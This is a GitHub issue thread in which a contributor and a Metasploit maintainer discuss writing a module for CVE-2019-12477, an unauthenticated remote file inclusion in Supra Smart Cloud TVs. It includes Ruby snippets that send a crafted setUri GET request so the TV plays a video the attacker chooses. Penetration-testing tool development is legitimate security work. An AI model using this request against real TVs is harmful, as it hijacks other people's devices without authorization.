### ISSUE TITLE
Supra Smart Cloud TV - CVE-2019-12477

### ISSUE THREAD

**Issue by RootUp** [rapid7/metasploit-framework#11943]
Hi all, If I wanted to write a module for [CVE-2019-12477](https://www.inputzero.io/2019/06/hacking-smart-tv.html), I wanted to understand the working approach of this module, although its an unauth remote file inclusion in a smart TV. As per my experience, the functionality of the module should be sending a simple crafted request to the smart TV which can broadcast `xyz` video which is requested by an attacker.

Reference: https://twitter.com/RandomDhiraj/status/1135472207407276032
Request someone could please guide me through.
Ping @wvu-r7

**Comment by h00die** [comment]
smells like some 10hrs of epic sax man on this one. @ccondon-r7 you up to test the module?

**Comment by wvu-r7** [comment]
Since you need to send a `GET` request, you'll want to use `send_request_cgi` from `HttpClient`. I think you've done this before.

It's probably a good idea to serve the `.m3u8` and video files yourself. Since you already have a working PoC, you can reuse the content you already have, assuming compatible licensing. I would use `HttpServer` to serve the files.

For an idea of where to start, you can take a look at https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/jenkins_metaprogramming.rb, which uses both the `HttpClient` and `HttpServer` libraries.

Hope this helps. Let me know if you have questions.

**Comment by RootUp** [comment]
I am stuck in serving `.m3u8` file, could suggest something.

```ruby
  def run_host(ip)
    fpath = "" 

    res = send_request_raw({
      'method' => 'GET',
      'uri'    => "/remote/media_control?action=setUri&uri=#{fpath}"
    })
   end
```

I was providing a full path of the video from the `data/` folder but that's an bad idea.

**Comment by wvu-r7** [comment]
Serve it in `on_request_uri` from `HttpServer`. You can reference the full URL with `get_uri`. See the other module for an example.

https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/http/server.rb
https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-module-using-HttpServer-and-HttpClient

**Comment by wvu-r7** [comment]
Also, you'll want to use `vars_get` in your request.

**Comment by RootUp** [comment]
This works so far,

```ruby
def run
	res = send_request_cgi({
		'method'   => 'GET',
		'uri'      => "/remote/media_control?action=setUri&uri=#{"data/fbroadcast.m3u8"}"
	})
		if res && res.code == 200
			print_good("Fake video was broadcasted")
		else
			print_error("No fake video was broadcasted")
		end
	end
end
```

**Comment by RootUp** [comment]
Closing this, we have completed the task.
